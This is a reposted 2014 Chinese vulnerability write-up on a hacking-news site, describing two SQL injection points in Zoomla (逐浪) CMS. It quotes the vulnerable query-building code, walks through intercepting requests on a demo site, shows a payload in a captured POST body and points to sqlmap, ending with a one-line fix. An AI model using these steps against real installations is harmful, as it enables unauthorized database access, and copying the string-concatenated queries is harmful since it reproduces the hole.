记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

逐浪CMS通用型SQL注入1+2

2014-01-03 12:00
其实这套东西好多注入。
 
注入1:
 
http://demo.zoomla.cn/mis/target/page.aspx
 
TxtKey参数
 
 
 

string selectedValue = this.drType.SelectedValue;

string text = this.TxtKey.Text;

this.dt = this.bll.Sel(string.Concat(new string[]

{

"ParentID=0 And Inputer='",

this.buser.GetLogin().UserName,

"' And type like '%",

selectedValue,

"%' And Title like '%",

text, //没有过滤直接带入查询,导致漏洞产生

"%'"

}), "ID desc");

 

 
前台注册一个用户。
 
先到http://demo.zoomla.cn/mis/target/AddTarget.aspx
 
添加一个名为test123的目标
 
访问下面的链接:
 
http://demo.zoomla.cn/mis/target/page.aspx
 
搜索test123
 
 
抓取数据包,把test123修改为test123%’*--
 

__VIEWSTATE=%2FwEPDwULLTEyMzkzMzg1NzcPZBYCAgMPZBYCAgcPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgExB3Rlc3QxMjNkZG7nnQ6pZXGUWElWkzGHXn71ZHNY&drType=&TxtKey=test123%’*--&Button1=%E6%90%9C%E7%B4%A2

 

连着cookie丢到sqlmap即可:
 


 
注入点2:
 
http://demo.zoomla.cn/mis/addmis.aspx
 
title参数
 
 
 
protected void Button_Click(object sender, EventArgs e)
 
 
DataTable dataTable = this.bll.Sel("Title='" + this.TextTitle.Text.Trim() + "'", ""); //title参数存在注入的问题。没有过滤
 
 
 
 
随便输入点信息:
 
点击确定,然后抓包

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMTY5OTMzNTg0ZGSXrsn5RKQ7H7z5jSEJzO1T2S1Tog%3D%3D&TextTitle=aaa&TextStatus=1&TextType=3&TextJoiner=a&StarDate=2013%2F10%2F24+10%3A50%3A01&EndDate=2013%2F10%2F24+10%3A50%3A04&TextContent=&BtnCommit=%E7%A1%AE%E5%AE%9A&ParentID=

 

 
 
TextTitle=aaa 存在注入
 
带上COOKIE丢到sqlmap即可
 



修复方案:
过滤,参数化查询
知识来源: www.2cto.com/Article/201401/269878.html

阅读:75309 | 评论:0 | 标签:注入 cms

想收藏或者和大家分享这篇好文章→复制链接地址

“逐浪CMS通用型SQL注入1+2”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词